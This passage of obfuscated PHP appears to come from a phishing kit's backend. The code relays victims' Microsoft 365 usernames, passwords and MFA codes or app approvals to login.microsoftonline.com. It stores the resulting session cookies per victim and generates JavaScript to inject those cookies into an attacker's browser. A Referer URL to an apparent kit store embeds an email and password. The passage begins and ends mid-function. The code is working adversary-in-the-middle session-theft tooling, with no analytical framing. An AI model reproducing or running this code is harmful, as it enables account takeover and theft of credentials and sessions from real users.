                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Sec-CH-UA" => 
                        ""Microsoft Edge";v="129", "Not=A?Brand";v="8", "Chromium";v="129"", 
                    "Sec-CH-UA-Mobile" => 
                        "?0", 
                    "Sec-CH-UA-Platform" => 
                        ""Windows"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0", 
                ], 
                "form_params" => [ 
                    "LoginOptions" => 
                        "1", 
                    "type" => "28", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        $this->ad1e3, 
                    "flowToken" => $this->fac50, 
                    "DontShowAgain" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "14108", 
                ], 
            ] 
        ); 
        goto b71f3; 
        dcd33: 
        $this->ad1e3 = $eb813[0]; 
        goto F8a7f; 
        c6100: 
        f43ad: 
        goto C901e; 
        a3869: 
        preg_match( 
            "/name="ctx" value="([^"]+)"/", 
            $A75e0, 
            $c1345 
        ); 
        goto Db49c; 
        fef95: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto E5583; 
        a5e1d: 
        goto f43ad; 
        goto d03df; 
        E086c: 
        $this->E423c = $D70fc[0]; 
        goto dcd33; 
        Fbc04: 
        if ( 
            strpos( 
                $A75e0, 
                ""sDeviceState":"Unregistered"" 
            ) !== false 
        ) { 
            goto c19bb; 
        } 
        goto A8e36; 
        e1964: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto B782c; 
        c15c6: 
        file_put_contents( 
            $this->A20d7 . 
                "/js_" . 
                $this->Fa736 . 
                ".txt", 
            $E3848 
        ); 
        goto D63c3; 
        Eda73: 
        ef3c8: 
        goto C22dc; 
        B8979: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto e3717; 
        Db49c: 
        if (isset($be20b[1])) { 
            goto Ab2c5; 
        } 
        goto D6656; 
        D04bf: 
        $Ddc7a = str_replace("\u0026", "&", $Ddc7a); 
        goto e0879; 
        A4308: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto Ddf6f; 
        Ab18b: 
        $Accd6 = $Bcc9d->request("GET", $Ddc7a, [ 
            "headers" => [ 
                "Accept" => 
                    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                "Accept-Language" => 
                    "en-US,en;q=0.9", 
                "Cookie" => $this->gencook( 
                    $this->A20d7 . 
                        "/cookie_" . 
                        $this->Fa736 . 
                        ".txt" 
                ), 
                "Priority" => 
                    "u=0, i", 
                "Sec-Ch-Ua" => 
                    ""Chromium";v="128", "Not;A=Brand";v="24", "Microsoft Edge";v="128"", 
                "Sec-Ch-Ua-Mobile" => 
                    "?0", 
                "Sec-Ch-Ua-Platform" => 
                    ""Windows"", 
                "Sec-Ch-Ua-Platform-Version" => 
                    ""15.0.0"", 
                "Sec-Fetch-Dest" => 
                    "document", 
                "Sec-Fetch-Mode" => 
                    "navigate", 
                "Sec-Fetch-Site" => 
                    "cross-site", 
                "Upgrade-Insecure-Requests" => 
                    "1", 
                "User-Agent" => 
                    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0 OS/10.0.22635", 
                "X-Edge-Shopping-Flag" => 
                    "0", 
            ], 
        ]); 
        goto fef95; 
        B4c77: 
        $this->status["2fa"] = true; 
        goto F941d; 
        c0ab7: 
        b093c: 
        goto B4c77; 
        B62f6: 
        $a967e = $be20b[1]; 
        goto Cf8a1; 
        F5d32: 
        B90df: 
        goto f9726; 
        f9325: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto D8942; 
        D7fcf: 
        if (isset($be20b[1])) { 
            goto ef3c8; 
        } 
        goto c899a; 
        Aa6d8: 
        preg_match( 
            "/name="request" value="([^"]+)"/", 
            $A75e0, 
            $be20b 
        ); 
        goto D7fcf; 
        d402b: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto Ce8c0; 
        c6529: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto B8979; 
        b1e89: 
        e378b: 
        goto C15b2; 
        d8ffa: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto f72c8; 
        f2be5: 
        $b0338 = json_decode($f8b73, true); 
        goto Ca09f; 
        ab77c: 
        if ( 
            !( 
                strpos( 
                    $A75e0, 
                    "Your account or password is incorrect" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "The password entered exceeds the maximum length" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "Bad Request" 
                ) !== false || 
                strpos($A75e0, "googlebot") !== 
                    false || 
                strpos( 
                    $A75e0, 
                    "Select a certificate " 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "smusxath.bms.com" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "not support JavaScript" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "trouble signing" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "having some server issues" 
                ) !== false || 
                strpos($A75e0, "apple.com") !== 
                    false || 
                strpos( 
                    $A75e0, 
                    "Not Allowed" 
                ) !== false || 
                strpos($A75e0, ".aon.com") !== false || 
                strpos( 
                    $A75e0, 
                    "Fifth Third ID" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "Configurable default behavior" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "persmissions to access this resource" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "urlMsaSignUp" 
                ) !== false 
            ) 
        ) { 
            goto B90df; 
        } 
        goto a693e; 
        C15b2: 
        Ac0bd: 
        goto ee5c5; 
        A8e36: 
        if ( 
            !( 
                strpos( 
                    $A75e0, 
                    "<title>Working...</title>" 
                ) !== false 
            ) 
        ) { 
            goto B5586; 
        } 
        goto Aa6d8; 
        D5ddc: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto B3add; 
        c6a91: 
        if (!isset($B2f3b[1])) { 
            goto E1b70; 
        } 
        goto Ad66b; 
        c2a45: 
        $this->status["2fa"] = false; 
        goto A4308; 
        C52ba: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto B713e; 
        F941d: 
        $c4ca3 = 
            "/\{\s*"arrUserProofs":(\[.*?\])\s*,/s"; 
        goto D05a3; 
        Ddf6f: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto B1f1c; 
        Eee21: 
        Ab2c5: 
        goto B62f6; 
        Ca09f: 
        if (!is_array($b0338)) { 
            goto e378b; 
        } 
        goto a05b0; 
        D63c3: 
        goto Ac0bd; 
        goto c0ab7; 
        B3add: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/login", 
            [ 
                "allow_redirects" => true, 
                "headers" => [ 
                    "Connection" => 
                        "keep-alive", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "User-Agent" => 
                        "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/	\x9		apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Referer" => 
                        "https://w3ll.store/api/[email protected]&pass=Buffie8238", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
                "form_params" => [ 
                    "i13" => "0", 
                    "login" => $this->Fa736, 
                    "loginfmt" => $this->Fa736, 
                    "type" => "11", 
                    "LoginOptions" => 
                        "3", 
                    "lrt" => "", 
                    "lrtPartition" => "", 
                    "hisRegion" => "", 
                    "hisScaleUnit" => "", 
                    "passwd" => $this->Ed558, 
                    "ps" => "2", 
                    "psRNGCDefaultType" => 
                        "", 
                    "psRNGCEntropy" => 
                        "", 
                    "psRNGCSLK" => "", 
                    "canary" => $this->B5b07, 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        "9799cd88-6ea7-4cfc-aeb2-4dcb20034a03", 
                    "flowToken" => $this->fac50, 
                    "PPSX" => "", 
                    "NewUser" => "1", 
                    "FoundMSAs" => "", 
                    "fspost" => "0", 
                    "i21" => "0", 
                    "CookieDisclosure" => 
                        "0", 
                    "IsFidoSupported" => 
                        "0", 
                    "isSignupPost" => "0", 
                    "i17" => "", 
                    "i18" => "", 
                    "i19" => "9189", 
                ], 
            ] 
        ); 
        goto f9325; 
        c899a: 
        goto c5c97; 
        goto Eda73; 
        C22dc: 
        $a967e = $be20b[1]; 
        goto a52d6; 
        Cf8a1: 
        fe7e5: 
        goto Acc51; 
        C901e: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto e1964; 
        b71f3: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto d402b; 
        eb79c: 
        if (!isset($B2f3b[1])) { 
            goto D4ab2; 
        } 
        goto Ff589; 
        Ce8c0: 
        $D5295 = file_get_contents( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto bd064; 
        ee5c5: 
    } 
    public function EndAuth($C19e5, $d8403 = "") 
    { 
        goto edc0e; 
        A164a: 
        A713f: 
        goto e2f31; 
        f041d: 
        $cfe83 = "OneWaySMS"; 
        goto Dba6c; 
        Dba6c: 
        bf2f3: 
        goto F57d6; 
        C4d10: 
        F9464: 
        goto Ec446; 
        F57d6: 
        goto Cb7c8; 
        goto C4d10; 
        c4392: 
        goto A1928; 
        goto e4a44; 
        Be3e7: 
        Cb7c8: 
        goto E3a3b; 
        Ec446: 
        $cfe83 = "PhoneAppOTP"; 
        goto Be3e7; 
        edc0e: 
        if ( 
            !( 
                $this->Fa736 != $_SESSION["email"] || 
                !isset($_SESSION["status"]) || 
                !isset( 
                    $_SESSION[ 
                        "info_token_2fa" 
                    ] 
                ) 
            ) 
        ) { 
            goto A713f; 
        } 
        goto d6b5f; 
        e2f31: 
        $this->status = $_SESSION["status"]; 
        goto C36a9; 
        d6b5f: 
        $this->redirect(); 
        goto A164a; 
        cf12a: 
        Ce986: 
        goto c4392; 
        Cbd60: 
        if (!($C19e5 == "verify_sms")) { 
            goto bf2f3; 
        } 
        goto f041d; 
        a8fb9: 
        $this->EndAuthApp(); 
        goto cf12a; 
        e8269: 
        if ($C19e5 == "verify_code") { 
            goto F9464; 
        } 
        goto Cbd60; 
        e4a44: 
        E9eb2: 
        goto e8269; 
        Ef0ed: 
        A1928: 
        goto e4e1c; 
        c095b: 
        if ( 
            $C19e5 == "verify_code" || 
            $C19e5 == "verify_sms" 
        ) { 
            goto E9eb2; 
        } 
        goto a3862; 
        C36a9: 
        $this->A20d7 = getcwd() . "/core"; 
        goto c095b; 
        E3a3b: 
        $this->EndAuthSmsAndCode($d8403, $cfe83); 
        goto Ef0ed; 
        a3862: 
        if (!($C19e5 == "verify_app")) { 
            goto Ce986; 
        } 
        goto a8fb9; 
        e4e1c: 
    } 
    public function EndAuthApp() 
    { 
        goto db593; 
        C2b0f: 
        $this->ad1e3 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["sCtx"]; 
        goto E5cd0; 
        aed2b: 
        $this->fac50 = $ea051; 
        goto B44e0; 
        af4e6: 
        $this->status["2fa_endauth"] = false; 
        goto C1b93; 
        b6d7d: 
        $this->B522d = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["api_canary"]; 
        goto Ddbc2; 
        ffb55: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto E94fa; 
        A6a8b: 
        $this->status[ 
            "2fa_endauth_reason" 
        ] = $b0338["Message"]; 
        goto ff550; 
        Dc64e: 
        $this->E423c = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["session_id"]; 
        goto C2b0f; 
        Edd31: 
        preg_match( 
            "/(?<="FlowToken":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto A1741; 
        d28e7: 
        goto D9cb3; 
        goto B126d; 
        a3069: 
        $Accd6 = $Bcc9d->get( 
            "https://login.microsoftonline.com/common/SAS/EndAuth", 
            [ 
                "query" => [ 
                    "authMethodId" => 
                        "PhoneAppNotification", 
                    "pollCount" => "1", 
                ], 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0", 
                    "Accept" => 
                        "application/json", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "hpgid" => "1114", 
                    "hpgact" => "2000", 
                    "canary" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["api_canary"], 
                    "client-request-id" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["request_id"], 
                    "hpgrequestid" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["session_id"], 
                    "x-ms-sessionId" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["session_id"], 
                    "x-ms-flowToken" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sFT"], 
                    "x-ms-ctx" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sCtx"], 
                    "Content-type" => 
                        "application/json; charset=utf-8", 
                    "DNT" => "1", 
                    "Connection" => 
                        "keep-alive", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Sec-Fetch-Dest" => 
                        "empty", 
                    "Sec-Fetch-Mode" => 
                        "cors", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                ], 
            ] 
        ); 
        goto ffb55; 
        a649a: 
        if ( 
            strpos( 
                $A75e0, 
                ""Success":true" 
            ) !== false 
        ) { 
            goto c81d9; 
        } 
        goto af4e6; 
        bbfae: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto a3069; 
        B44e0: 
        $this->cc473 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["sCtx"]; 
        goto b6d7d; 
        E94fa: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto a649a; 
        E5cd0: 
        $this->ProcessAuthApp(); 
        goto F543e; 
        B126d: 
        c81d9: 
        goto Cc46b; 
        db593: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto bbfae; 
        F543e: 
        D9cb3: 
        goto Da069; 
        A1741: 
        $ea051 = $ea051[0]; 
        goto aed2b; 
        Cc46b: 
        $this->status["2fa_endauth"] = true; 
        goto Edd31; 
        D63e4: 
        if (!isset($b0338["Message"])) { 
            goto c3147; 
        } 
        goto A6a8b; 
        ff550: 
        c3147: 
        goto d28e7; 
        Ddbc2: 
        $this->B5b07 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["canary"]; 
        goto Dc64e; 
        C1b93: 
        $b0338 = json_decode($A75e0, true); 
        goto D63e4; 
        Da069: 
    } 
    public function EndAuthSmsAndCode($d8403, $cfe83) 
    { 
        goto Fac96; 
        e06cc: 
        $this->ad1e3 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["sCtx"]; 
        goto Bf8f6; 
        b8145: 
        $this->fac50 = $ea051; 
        goto B6677; 
        eed01: 
        b9bb0: 
        goto c8247; 
        C4532: 
        $this->E423c = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["session_id"]; 
        goto e06cc; 
        B6677: 
        $this->cc473 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["sCtx"]; 
        goto e6c0f; 
        D78ff: 
        goto Eaca5; 
        goto eed01; 
        B9bca: 
        Eaca5: 
        goto e18ef; 
        e6c0f: 
        $this->B522d = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["api_canary"]; 
        goto Aba0d; 
        F0fb4: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto Cc084; 
        c02db: 
        $ea051 = $ea051[0]; 
        goto b8145; 
        Fac96: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto F0fb4; 
        Aba0d: 
        $this->B5b07 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["canary"]; 
        goto C4532; 
        B1354: 
        $b0338 = json_decode($A75e0, true); 
        goto aa55d; 
        F0a15: 
        $this->status[ 
            "2fa_endauth_reason" 
        ] = $b0338["Message"]; 
        goto Cd94f; 
        Ef2f5: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto B5128; 
        c8247: 
        $this->status["2fa_endauth"] = true; 
        goto f9175; 
        F570a: 
        if ( 
            strpos( 
                $A75e0, 
                ""Success":true" 
            ) !== false 
        ) { 
            goto b9bb0; 
        } 
        goto F58cc; 
        aa55d: 
        if (!isset($b0338["Message"])) { 
            goto bbc45; 
        } 
        goto F0a15; 
        f9175: 
        preg_match( 
            "/(?<="FlowToken":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto c02db; 
        B5128: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto F570a; 
        F58cc: 
        $this->status["2fa_endauth"] = false; 
        goto B1354; 
        Cc084: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/SAS/EndAuth", 
            [ 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0", 
                    "Accept" => 
                        "application/json", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Hpgid" => "1114", 
                    "Hpgact" => "2000", 
                    "Canary" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["api_canary"], 
                    "Client-Request-Id" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["request_id"], 
                    "Hpgrequestid" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["session_id"], 
                    "Content-Type" => 
                        "application/json; charset=utf-8", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Sec-Fetch-Dest" => 
                        "empty", 
                    "Sec-Fetch-Mode" => 
                        "cors", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
                "json" => [ 
                    "Method" => 
                        "EndAuth", 
                    "SessionId" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["session_id"], 
                    "FlowToken" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sFT"], 
                    "Ctx" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sCtx"], 
                    "AuthMethodId" => $cfe83, 
                    "AdditionalAuthData" => $d8403, 
                    "PollCount" => 1, 
                ], 
            ] 
        ); 
        goto Ef2f5; 
        Bf8f6: 
        $this->ProcessAuthSmsAndCode($d8403, $cfe83); 
        goto B9bca; 
        Cd94f: 
        bbc45: 
        goto D78ff; 
        e18ef: 
    } 
    public function ProcessAuthSmsAndCode($d8403, $cfe83) 
    { 
        goto A9d11; 
        e2f14: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto Ca9e1; 
        e7d2c: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto F3d86; 
        Eb4c1: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto ca801; 
        ef5c8: 
        $Bc3b4 = $Bc3b4[0]; 
        goto a38ae; 
        De3ec: 
        $this->B5b07 = $ef175; 
        goto Bc622; 
        B4c9d: 
        $this->B5b07 = $ef175; 
        goto aa20f; 
        c880d: 
        $Accd6 = $Bcc9d->request( 
            "POST", 
            "https://login.microsoftonline.com/kmsi", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cache-Control" => 
                        "max-age=0", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Sec-CH-UA" => 
                        ""Microsoft Edge";v="129", "Not=A?Brand";v="8", "Chromium";v="129"", 
                    "Sec-CH-UA-Mobile" => 
                        "?0", 
                    "Sec-CH-UA-Platform" => 
                        ""Windows"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0", 
                ], 
                "form_params" => [ 
                    "LoginOptions" => "1", 
                    "type" => "28", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        $this->ad1e3, 
                    "flowToken" => $this->fac50, 
                    "DontShowAgain" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "14108", 
                ], 
            ] 
        ); 
        goto F2ffe; 
        Ca303: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto C0481; 
        d5d29: 
        $this->fac50 = $ea051; 
        goto B86f4; 
        ccc9b: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $E2cb4 
        ); 
        goto ee811; 
        ca801: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto ef5c8; 
        c537c: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto e6376; 
        A9d11: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto Ebce6; 
        Ceb1a: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto Eb4c1; 
        F4820: 
        $ea051 = $ea051[0]; 
        goto E29c4; 
        ee9dd: 
        $D5295 = file_get_contents( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto e9b65; 
        Ce168: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto Aba68; 
        d26ad: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/resume", 
            [ 
                "query" => [ 
                    "skipmfaregistration" => 
                        "1", 
                ], 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/SAS/ProcessAuth", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "TE" => "trailers", 
                ], 
                "form_params" => [ 
                    "flowToken" => $this->{$ea051}, 
                    "ctx" => $e6a8e, 
                    "canary" => $this->{$ef175}, 
                ], 
            ] 
        ); 
        goto Ceb1a; 
        E29c4: 
        $this->fac50 = $ea051; 
        goto faceb; 
        Ca9e1: 
        $ea051 = $ea051[0]; 
        goto d5d29; 
        E1044: 
        $this->cc473 = $Bc3b4; 
        goto ccc9b; 
        C0481: 
        $ef175 = $ef175[0]; 
        goto Ac6ba; 
        e9b65: 
        $E3848 = 
            "(function() {\xd\xa	\x9\x9		let cookies = JSON.parse(`" . 
            $D5295 . 
            "`);
\x9	\x9\x9\xd
	\x9\x9\x9	function putCookie(key, value, domain, path, isSecure) {\xd\xa\x9\x9			\x9const cookieMaxAge = "Max-Age=31536000";\xd
\x9\x9\x9			if (key.startsWith("__Host")) {\xd
\x9		\x9\x9\x9\x9console.log("==== Kratos ====>", key, value);\xd
\x9\x9	\x9		\x9document.cookie = `${key}=${value};${cookieMaxAge};path=/;Secure;SameSite=None`;\xd
\x9\x9		\x9	} else if (key.startsWith("__Secure")) {\xd\xa\x9	\x9	\x9		console.log("==== Kratos ====>", key, value);
\xa\x9		\x9			document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;\xd\xa\x9\x9	\x9\x9\x9} else {\xd\xa			\x9\x9\x9	if (isSecure) {
\xa	\x9\x9		\x9		console.log("==== Kratos ====>", key, value);
\x9				\x9\x9\x9if (window.location.hostname == domain) {\xd\xa	\x9			\x9\x9		document.cookie = `${key}=${value};${cookieMaxAge}; path=${path}; Secure; SameSite=None`;
			\x9		\x9	} else {\xd\xa\x9\x9	\x9\x9	\x9\x9	document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;
\xa			\x9		\x9\x9}
	\x9		\x9	\x9} else {
		\x9	\x9\x9\x9\x9console.log("==== Kratos ====>", key, value);\xd\xa	\x9\x9\x9\x9\x9		if (window.location.hostname == domain) {
\x9\x9\x9		\x9\x9\x9\x9document.cookie = `${key}=${value};${cookieMaxAge};path=${path};`;\xd
\x9	\x9	\x9	\x9	} else {
\xa\x9\x9	\x9\x9\x9\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};`;
\xa\x9	\x9	\x9\x9\x9	}\xd\xa\x9			\x9	\x9}
\xa	\x9		\x9\x9}\xd\xa	\x9			}\xd
	\x9\x9	\x9for (let cookie of cookies) {
\x9			\x9	putCookie(cookie.Name, cookie.Value, cookie.Domain, cookie.Path, cookie.Secure);\xd
\x9	\x9	\x9}
\x9	\x9\x9}());"; 
        goto C1702; 
        e3231: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/SAS/ProcessAuth", 
            [ 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
